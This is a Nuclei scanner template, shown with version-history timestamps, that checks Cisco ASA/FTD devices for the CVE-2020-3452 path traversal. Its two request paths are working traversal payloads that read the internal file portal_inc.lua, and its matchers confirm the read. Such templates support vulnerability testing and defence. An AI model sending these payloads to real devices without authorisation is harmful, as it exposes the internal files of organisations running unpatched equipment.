nuclei-templates/cves/2020/CVE-2020-3452.yaml

21 lines
627 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-3452
2020-07-22 19:29:49 +00:00
info:
name: CVE-2020-3452
author: pdteam
severity: medium
reference: https://twitter.com/aboul3la/status/1286012324722155525
tags: cve,cve2020,cisco,traversal
2020-07-22 19:29:49 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
- "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
2020-07-22 19:29:49 +00:00
matchers:
- type: word
words:
- "INTERNAL_PASSWORD_ENABLED"
- "CONF_VIRTUAL_KEYBOARD"
condition: and